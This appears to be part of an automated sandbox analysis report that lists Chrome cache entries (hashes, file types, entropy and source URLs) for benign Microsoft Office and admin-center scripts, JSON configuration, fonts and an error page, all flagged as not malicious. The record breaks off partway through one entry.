                                                        SHA-512:8BA3EE568430AA6E15599BE2C9EBDC31BBF4DD8AB7A4EB5E91A01BBCCBFDC0B5FE0845E00CAE6CB35ED455D44DCB8640F98F352628DBAD822CCEB6F6EA86DEFA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-10-18.010/wacowlhostwebpack/13.js
                                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[13],{130:(e,t,n)=>{function a(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];i()&&console.log.apply(console,e)}function i(){try{if("sessionStorage"in window&&window.sessionStorage){var e=window.sessionStorage.enableFCILogging;return e&&"true"===e.toLowerCase()&&"undefined"!=typeof console&&!!console}}catch(e){}return!1}n.r(t),n.d(t,{getFirstCPUIdle:()=>o});var r=function(){function e(e){this._longTaskId=0,this._checkFCIRunId=0,this._isDisposed=!1;var t=e.requiredMainThreadCPUIdleDurationInMilliseconds,n=e.measurementStartTime;this._measureName=e.measureName||"FCI",this._measurementStartTime=n,this._requiredMainThreadCPUIdleDurationInMilliseconds=t,this._resultResolver={resolve:void 0,reject:void 0},this._fciPromise=void 0,this._longTasks=[],this._processLongTaskPreQueue(e.initialEntries),this._registerLongTaskObserver()}return e.prototype.measureFCI=function(){var e=this;if(this._isDisposed)throw

                                                        Chrome Cache Entry: 346

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 76 x 27, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):4.068159130770306
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CA1FFB772DFDFDFAC2692FAFB775AE8A
                                                        SHA1:3893D73555B8F42FBC72C2C1CD912AE5108BE2C8
                                                        SHA-256:09EC64C1FAC9E05A6FE948385BD41999F0ACD82ACEFCD86456FB111976DEF3D0
                                                        SHA-512:07E972E63CE33F031C6504D30264717ED8F155EF7940D67CFD1E7CB62511C1B6DF3CE95068D3B5DD4780A039CAAFAFE6CE6191BF3F6C4FDA4C9FF8F307C2D8DD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8db2dd404f5b2e75/1730369522862/aLObsD7_kLjFdEu
                                                        Preview:.PNG........IHDR...L.........Y~.3....IDAT.....$.....IEND.B`.

                                                        Chrome Cache Entry: 347

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (641)
                                                        Category:dropped
                                                        Size (bytes):4173765
                                                        Entropy (8bit):5.619973204015582
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C228959592B6A67791EA8D90FC201B02
                                                        SHA1:53CEA6B1BCB4447E4906E873C056B94D85878369
                                                        SHA-256:8E01C024A29C1B780053B34829AD906F9295BCC394E8E40454EC7A0CCD8BB327
                                                        SHA-512:8F37B5E62197CB578471917845E36409418F1FBB07CAF73524D82FBCF1BA80F18B8D4B76B6661BBFCB95FB45260C7CFE75ABE4E7F644F51FC1473F29F136119E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/*. ********************************************************************************************************* !*\. !*** /mnt/vss/_work/1/s/ooui/.store/toposort@1.0.7-e70287510c5359da9183/node_modules/toposort/index.js ***!. \******************************************************************************************************** no static exports found ************************************ !*\. !*** ./lib/DynamicScriptLoader.js ***!. \*********************************** ./getOrderedScriptAndDependencies ./loadScript ./preloadScript ********************************** !*\. !*** ./lib/appResourceLoader.js ***!. \********************************* ************************************************ !*\. !*** ./lib/getOrderedScriptAndDependencies.js ***!. \*********************************************** toposort ********************** !*\. !*** ./lib/index.js ***!. \********************* ./DynamicScriptLoader ./appResourceLoader *************************** !*\. !*** ./lib/loadSc

                                                        Chrome Cache Entry: 349

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):1740195
                                                        Entropy (8bit):5.813771143067965
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:84E614902A24014FEE57E36F359E797F
                                                        SHA1:3AA1735932319EA506BDBC98D4E93DFC37159D1F
                                                        SHA-256:481727D2D0B1D5363998239D013B7E610869D5DF1FAA14E80EA4713FA14D349B
                                                        SHA-512:255B48B6ED9A21E4D6FD17D0DA446F1B2D54C17BEBD8311CADA6927AC18D85D81A3E8CF3A4C7061E8F5AADBAF48DBAE045A1549FA9C53F19A9BBF03A81B6BA5E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:(globalThis.visioOnlineChunks=globalThis.visioOnlineChunks||[]).push([[306],{524:function(e,t,o){var n=o(89404),r=o(62128);"string"==typeof n&&(n=[[e.id,n]]);for(var i=0;i<n.length;i++)r.loadStyles(n[i][1],!1);n.locals&&(e.exports=n.locals)},89404:function(e,t,o){var n=o(91940),r=o(74989)(n);r.push([e.id,'svg>path.OfficeIconColors_m20 {\r\n fill: #FAFAFAFF;\r\n}\r\nsvg>path.OfficeIconColors_m21 {\r\n fill: #C8C6C4FF;\r\n}\r\nsvg>path.OfficeIconColors_m22 {\r\n fill: #3A3A38FF;\r\n}\r\nsvg>path.OfficeIconColors_m23 {\r\n fill: #797774FF;\r\n}\r\nsvg>path.OfficeIconColors_m24 {\r\n fill: #1E8BCDFF;\r\n}\r\nsvg>path.OfficeIconColors_m25 {\r\n fill: #0063B1FF;\r\n}\r\nsvg>path.OfficeIconColors_m26 {\r\n fill: #83BEECFF;\r\n}\r\nsvg>path.OfficeIconColors_m27 {\r\n fill: #379E4EFF;\r\n}\r\nsvg>path.OfficeIconColors_m28 {\r\n fill: #309048FF;\r\n}\r\nsvg>path.OfficeIconColors_m29 {\r\n fill: #A1DDAAFF;\r\n}\r\nsvg>path.OfficeIconColors_m210 {\r\n fill: #DE6C00

                                                        Chrome Cache Entry: 350

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):2374
                                                        Entropy (8bit):5.1581762425310025
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:90F0C2C8EEA21DC9C4CFB5354B1A4A4F
                                                        SHA1:4FFD2206F3BA4D07EBC597F8A933BFFA34F68FED
                                                        SHA-256:18DFB835A4C22AEBEBD7701B6B800709F2DC6C61003F09D8A04050D41921E98E
                                                        SHA-512:DA9D338519529827162671BA4E18F53922CC25F2A77E24F7823EAF10D023476828079A263C2AD6DCB220A65E2F137E6279E4BA5AB78F6B4DF61DF57944F6CC16
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://admin.microsoft.com/admin/api/uxversion?bldVer=v1
                                                        Preview:{"floodgate":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/floodgate.en.bundle.js"},"version":"2024.10.24.1"},"ariaLoggerId":"ea84b6a3285140258eaeb7caaab5884a-9d3ca75b-b3ee-42b8-a22c-ab0759ad4d38-7330","hostingAppUrls":"{\"M365AdminPortal\":\"https://admin.microsoft.com\",\"EXOAdminPortal\":\"https://admin.exchange.microsoft.com\",\"SPOAdminPortal\":\"https://admin.microsoft.com/sharepoint\",\"TeamsAdminPortal\":\"https://admin-int.teams.microsoft.net/\",\"MSGraphEndPoint\":\"https://graph.microsoft.com\",\"CDNContentURL\":\"https://res.cdn.office.net/admincenter/admin-content\",\"AriaLoggerGlobalCollectorEndpoint\":\"https://mobile.events.data.microsoft.com/Collector/3.0\",\"AriaLoggerEUCollectorEndpoint\":\"https://eu-mobile.events.data.microsoft.com/Collector/3.0\",\"AriaLoggerId\":\"ea84b6a3285140258eaeb7caaab5884a-9d3ca75b-b3ee-42b8-a22c-ab0759ad

                                                        Chrome Cache Entry: 352

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (12695)
                                                        Category:downloaded
                                                        Size (bytes):1336972
                                                        Entropy (8bit):5.4872406967459035
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:1156EE8CD4AA893983B8CBFB73134B3F
                                                        SHA1:726BEFE5ADB6CBD512C4515496A11353AEF310ED
                                                        SHA-256:AAA6BBA043CBE92F6488020D72C00F45C28E0FF77E49E09BACDA0915214FA4DC
                                                        SHA-512:C692B6DB08073691C36B05EBD0A4A7C38E3FB47A25B6234A94D7855163DBFA1D83F2EFA8038CE6ACCE9D9C365B00A379B2812CFD5F721A640F539E4DC9C2EFA0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/floodgate.en.bundle.js
                                                        Preview:!function(){var e,t,r,n,o,a={4676:function(e,t){e.exports={Form:{Cancel:()=>"Cancel",CommentPlaceholder:()=>"Please do not include any confidential or personal information in your comment",EmailPlaceholder:()=>"Email (optional)",Submit:()=>"Send",Title:()=>"Feedback to Microsoft",TemplateErrorMessage:()=>"One or more questions are required or the input is not valid"},Questions:{ContactMeQuestion:()=>"You may contact me about this feedback"},Common:{LoadingText:()=>"Loading, please wait..."},Error:{ErrorMessage:()=>"Survey failed to load"}};},6870:function(e,t){e.exports={CloseLabel:()=>"Close dialog",EmailTextFieldPlaceholder:()=>"Email (optional)",EmailTextFieldInputError:()=>"Email address is invalid",CommentTextFieldPlaceholder:()=>"Please do not include any confidential or personal information in your comment",CommentTextFieldMaxLengthText:e=>"."+e.remainingMaxLength+". of ."+e.maxLength+". characters remaining",EmailConsentCheckboxLabel:()=>"You can contact me about this f

                                                        Chrome Cache Entry: 354

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):485734
                                                        Entropy (8bit):5.43532826725921
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:E4B19C4B145F9586B1E3A32F90BA8C04
                                                        SHA1:16C0AD33068E4C03052BBED8C552A51AD9E1E503
                                                        SHA-256:2FF92527B7A465745F13592A909C162B9B05DA591CAB83FEB5F0F13544C6E87D
                                                        SHA-512:C1514B2A45CA0F22FB1B1133A16EC14276038A2CE244CB3050E636D74DFFBFF3AD1DDCF1ECE3D75906E7F9075AC1FA13D320ABE59B595D91B0BA99C23AA16404
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/h2FF92527B7A46574_App_Scripts/es2020/sharedComments.min.js
                                                        Preview:(globalThis.visioOnlineChunks=globalThis.visioOnlineChunks||[]).push([[378],{33773:function(e,t,n){"use strict";var r,o,i,a;n.d(t,{eT:function(){return a},IY:function(){return c},OX:function(){return r},jL:function(){return i},E$:function(){return y},Q8:function(){return T},Gs:function(){return v}}),function(e){e[e.HostDefaultOrder=0]="HostDefaultOrder",e[e.NewestFirst=1]="NewestFirst"}(r||(r={})),function(e){e[e.Unknown=0]="Unknown",e[e.UnableToReconcile=1]="UnableToReconcile",e[e.DivergentChange=2]="DivergentChange"}(o||(o={})),function(e){e[e.Unknown=0]="Unknown",e[e.RuntimeTeardown=1]="RuntimeTeardown",e[e.RangeObsolete=2]="RangeObsolete"}(i||(i={})),function(e){e[e.All=0]="All",e[e.ResolvedOnly=1]="ResolvedOnly",e[e.ActiveOnly=2]="ActiveOnly"}(a||(a={}));var s=n(78203),d=n(11568),c=function(){function e(e){this.getCapabilities=function(){return Promise.resolve(void 0)},this.getHostSpecificLabels=function(){throw new s.mU("Method not implemented.",s.m2.reserveTag(537743701))},this.

                                                        Chrome Cache Entry: 355

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):30974
                                                        Entropy (8bit):5.175526930540541
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:DEA09D6B7D947D0E02F46C370B156343
                                                        SHA1:7C27E5389422D288C06D6EFC15A609BE1B90CAC3
                                                        SHA-256:3C30F72EA90E49B5820BA8C0CA23FFDF092D55B348E9C18FC21FD4C41615F283
                                                        SHA-512:7D246E5A58AC10C4D9DF851C3480F69BBEDB2A81281D126A5B343C7BA02C5949848B74B9B50C834317428B1D2C5F31B1B4A38AC34A2D5C77A06E2C1F5BDDA2AF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/shellux/api/ShellBootInfo/consumer/OneShell/en-us
                                                        Preview:{"Architecture":1,"Audience":0,"Resources":{"Version":"1.20241028.1.0","CatalogXml":"<ResourceCatalog>\r\n <Resources>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-8fa3fcbaf655144b938c_node_modules_mecontrol_flue-70ecb5\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-8fa3fcbaf655144b938c_node_modules_mecontrol_flue-70ecb5.2c12a0f1a9606c2bcbeb.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-8fa3fcbaf655144b938c_node_modules_mecontrol_flue-70ecb5.2c12a0f1a9606c2bcbeb.js</LTRPath>\r\n </Resource>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-8fa3fcbaf655144b938c_node_modules_mecontrol_flue-dc2895\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-8fa3fcbaf655144b938c_node_modules_mecontrol_flue-dc2895.896cfc8d4a4f38ddab8e.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-we

                                                        Chrome Cache Entry: 358

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):76571
                                                        Entropy (8bit):5.364259301211758
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:4DE42314D6EDDA70DF9779762ACC12B8
                                                        SHA1:2AF63137ABC68C0910107F8598B7DE48FD5BBD9C
                                                        SHA-256:7E86DF2AC06E3524CB7BC6F0B8EB07565BA6D103EAF3CF1A30AC4C78F11A4EAA
                                                        SHA-512:4465A7B79288AC5B75B4B21DDE3EA774F94AC209DDADFF99DA7741ED841C739C1F82DAEB550DC707A986FFFED8B9B84F45CA7705F40244A993D0CE34BD65B02B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/h7E86DF2AC06E3524_App_Scripts/Feedback/latest/officebrowserfeedback_ecs_client.js
                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.FloodgateDynamicCampaign=t():e.FloodgateDynamicCampaign=t()}(self,(function(){return function(){var e={7222:function(e,t,n){"use strict";var r=this&&this.__createBinding||(Object.create?function(e,t,n,r){void 0===r&&(r=n),Object.defineProperty(e,r,{enumerable:!0,get:function(){return t[n]}})}:function(e,t,n,r){void 0===r&&(r=n),e[r]=t[n]}),i=this&&this.__exportStar||function(e,t){for(var n in e)"default"===n||Object.prototype.hasOwnProperty.call(t,n)||r(t,e,n)};Object.defineProperty(t,"__esModule",{value:!0}),t.IFloodgateHostPlatform=t.GovernedChannelType=t.ICampaignDefinitions=t.Api=void 0,i(n(7560),t),t.Api=n(7560),i(n(2783),t),i(n(8262),t),i(n(234),t);var o=n(9556);Object.defineProperty(t,"ICampaignDefinitions",{enumerable:!0,get:function(){return o.ICampaignDefinitions}});var s=n(8445);Object.defineProperty(t,"Govern

                                                        Chrome Cache Entry: 359

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format, TrueType, length 3052, version 4.-22282
                                                        Category:downloaded
                                                        Size (bytes):3052
                                                        Entropy (8bit):7.719621094274623
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A11193DEB0B6BA33E4782396F19F3D0C
                                                        SHA1:6200BCA8CB8A8C7B8C2AA7E8665E464ED5D15194
                                                        SHA-256:FE05188DA3C5A767088355C5FB1229BA979AEDC8727AD8FCF9C170267C52B786
                                                        SHA-512:38BB35A8A47FC8FD6C42ABF812F81453ED0C73EDA82695F0DDB9324EC06A68CBE07DE05BC1A95E9289ABE75AF34A463EBB36040F731A4375FE4E6D9A359D4FC2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hFE05188DA3C5A767_App_Scripts/fonts/sharedheaderplaceholder-icons.woff
                                                        Preview:wOFF........................................OS/2...D...H...`1Y{.cmap.......N...r....cvt ....... ...*....fpgm...........Y...gasp................glyf............@.-.head.......2...6.P.@hhea...........$....hmtx................loca... .........F..maxp...4....... .&..name...T...........Upost...L....... .Q..prep...`........x...x.c`a_.8.....u..1...4.f...$..........@ ...........<...!$.X.........~..x.c```f.`..F.......|... -..@.......<.~^......1E$.I<.8'.A.Sl..:.4...)6......(..x.c.b.e(`h`X.......x............x.]..N.@..s$..'@:!.u*C....K$.%%...J.......n..b.........|.s...|v..G*)V.7........!O.6eaL.yV.e.j..kN..M.h....Lm....-b....p.N.m.v.....U<..#...O.}.K..,V..&...^...L.c.x.....?ug..l9e..Ns.D....D...K........m..A.M....a.....g.P..`....d.............x..TMh.G.~ogWk..X^.k+.F....*...=.......'....l$..P..MV..v.E.?....@..9$=..S..!...%&`.s(u......].^..f.....f..X.`?.....@qx.~..F..7...Q..n.~.M.}X.....A..`...@g..isq.o...t.|.....)@.....c~..+.....-B..D....E....B...|.}.6>.....y..].6....

                                                        Chrome Cache Entry: 364

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (63604)
                                                        Category:dropped
                                                        Size (bytes):130560
                                                        Entropy (8bit):5.272245687496742
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:ACDFECB80B06F30C59B48F9B2140E6F5
                                                        SHA1:C46873F855BDABF9943DA278813B53B4DD6FB6D6
                                                        SHA-256:CA46523D06A57712685B5C6B01430B530FE76F8FD5803179FCAA3466770E93A0
                                                        SHA-512:9BD579F55596F100C7A3723AE2345F3C43785BAF0576BFB5060F495FC8B7CCA3BD9FB43EA71B6F39FB68DFA82B80239A862E8186AD2956F2D4DFE1C971BEF293
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/*! For license information please see odsp.react.lib-9ea4d016.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.react.lib"],{react_340:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.ca

                                                        Chrome Cache Entry: 365

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):191862
                                                        Entropy (8bit):5.396451572038463
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B7D1F92F3C3870DD566C0BC8C78B88E0
                                                        SHA1:B5B5EAA65A88F0BB367793ACBAB07A3BE82EEE9E
                                                        SHA-256:37AB3030DBC6C5961634B987B31556C3B620DF684F99951DC3AA4543DB914F38
                                                        SHA-512:665B08A6CF93F491EC47BC84BCF651C4EB5E7E2A9D60EE4FBED53272D50717E61F922FFA1520B01B884F3C416AAEE8AC5B8A3D9E9D5376D544CB8918A16186DF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://wise.public.cdn.office.net/wise/owl/visio.boot.9cfd12211ab7303ce8cb.js
                                                        Preview:var Microsoft="object"==typeof Microsoft?Microsoft:{};Microsoft.Office=Microsoft.Office||{},Microsoft.Office.Visio=function(t){var i={};function e(s){if(i[s])return i[s].exports;var o=i[s]={i:s,l:!1,exports:{}};return t[s].call(o.exports,o,o.exports,e),o.l=!0,o.exports}return e.m=t,e.c=i,e.d=function(t,i,s){e.o(t,i)||Object.defineProperty(t,i,{enumerable:!0,get:s})},e.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},e.t=function(t,i){if(1&i&&(t=e(t)),8&i)return t;if(4&i&&"object"==typeof t&&t&&t.__esModule)return t;var s=Object.create(null);if(e.r(s),Object.defineProperty(s,"default",{enumerable:!0,value:t}),2&i&&"string"!=typeof t)for(var o in t)e.d(s,o,function(i){return t[i]}.bind(null,o));return s},e.n=function(t){var i=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(i,"a",i),i},e.o=function(t,i){return Object.prototype.hasOwnPrope

                                                        Chrome Cache Entry: 366

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):3833
                                                        Entropy (8bit):4.379869110127919
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7B09B3BCB15F923616DE2B24187F9B42
                                                        SHA1:925355A49AC0609BA20246134292167B89F5AE08
                                                        SHA-256:B03CC15046115B1E430FA8F567AE6AC0BA940323318D63447E33B0EE30A90EC0
                                                        SHA-512:A26352CBECD9C2F2C0D99DC9D94C1662BD8EA77177BDB9E70C939FD4F66A0BA6A4364AD10082C05B8A1F82F185AF7F62CCFB4156AC580552729E30A3AC69D9EB
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"timestamp":1730369534472,"BootstrapperUlsHeartBeatIsEnabled":false,"EnableCommonHostDiagnosticsParams":true,"ShouldLogJsApiKpisForWord":true,"EnableFramePageErrorReportingForWord":false,"EnableWordSessionRefreshTelemetry":false,"EnableWordSessionRefreshLoggingCleanup":false,"BootstrapperSettingsFetchPeriod":60000,"BootstrapperUlsHeartbeatIntervalMs":5000,"BootstrapperMaxUlsHeartbeatTime":600000,"BootstrapperNoCompleteWarning1Time":120000,"BootstrapperNoCompleteWarning2Time":180000,"BootstrapperUlsUploadCadenceMs":60000,"WordRefreshTelemetryExpirationInDays":7,"RequestedCallThrottlingDefaultToViewMinimumValue":"Major","RemoteUlsETag":"296849E457D14E58EBDDE9A17114D4475DBB5A97","RemoteUlsSuppressions":"378069,1671813,2208151,2209344,3249545,3290144,4273285,4285850,4298965,4298968,4298969,4751696,5018275,5306497,5904476,6375195,6572226,6948167,7463498,8194017,8458642,17044289,17085210,17085216,17162522,17358857,17387682,19214611,19243470,19707039,19743902,19939648,20486158,21627712,21631

                                                        Chrome Cache Entry: 369

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1208
                                                        Entropy (8bit):5.4647615085670616
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:D29FA9F2AB3A72F2608E8E82C8C3D1C6
                                                        SHA1:8B21CC06752837B4B6B8FEF8D54F50EB2C7CCA8F
                                                        SHA-256:E1B0A10649C4B92F828523EFC2EBE135EA9488179A2816888D1E84F786202DBF
                                                        SHA-512:824A207E3F5AF4934B7B50FE5E3F8585FAECA571C3C39E510C06DC8FBDF3E64B07811CAAE06239936BDDDDFA4C90E534F03C0DA8147AF9294042DEA6B0FBCB94
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>500 - Internal server error.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-

                                                        Chrome Cache Entry: 370

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):101803
                                                        Entropy (8bit):5.333052740426743
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:2F1D74149F052D3354358E9856375219
                                                        SHA1:8019F7A2EA824930F91C3EC375D926B650FB1CFF
                                                        SHA-256:66C70312DE6CA4E1D7EF1E858307764C241A80E7411CEE686EA2FC2D74152749
                                                        SHA-512:2B1C4E057DBF59E89C3AA9C5DAB1FE8F512ED400088B13592E493B3D48AA334544A7999CA2DDEFA34C23D2F96A2F98B93DD0AAC80C3CF7C37D85B49C5A85A6E6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:var otelWorker=function(e){var n={};function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:r})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&n&&(e=t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)t.d(r,i,function(n){return e[n]}.bind(null,i));return r},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=7)}([function(e,n,t){"use strict";t.d(n,"h",(function(){return r})),t.d(

                                                        Chrome Cache Entry: 372

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (29173), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):29173
                                                        Entropy (8bit):5.201883067368051
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F6228139447C795F72C09114F8289A8C
                                                        SHA1:0D0499DC74723111C0B78792B40BF5B8D04A2FB2
                                                        SHA-256:E6108C2F14C08CE48EB243728C24011A8E70E60DCA21BFA51FFFC6B1B8A999C7
                                                        SHA-512:F3087F1B24B65AA4F2007B168A8F5A1D0ACFA8BB6677FF156CE6A4B4A76234820B390F2DC444DE2EEFC4F58FB35BF3E1F866481A92383C914D20BBD44EDBC0A2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-10-18.010/require-f6228139.js
                                                        Preview:!(function(){if("PerformanceLongTaskTiming"in window){var e=window.__tti={e:[]};e.o=new PerformanceObserver((function(t){e.e=e.e.concat(t.getEntries())}));e.o.observe({entryTypes:["longtask"]})}})();!(function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["es6-symbol"]=t():(e["es6-symbol"]=t(),e.Symbol=e.Symbol||e["es6-symbol"])})(window,(function(){return(function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e

                                                        Chrome Cache Entry: 373

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (24306), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):24452
                                                        Entropy (8bit):5.328428296210481
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:AC459993971D136B5C420665B272E101
                                                        SHA1:3C84797F6C43434519212E1AE74E84C4BC9E133A
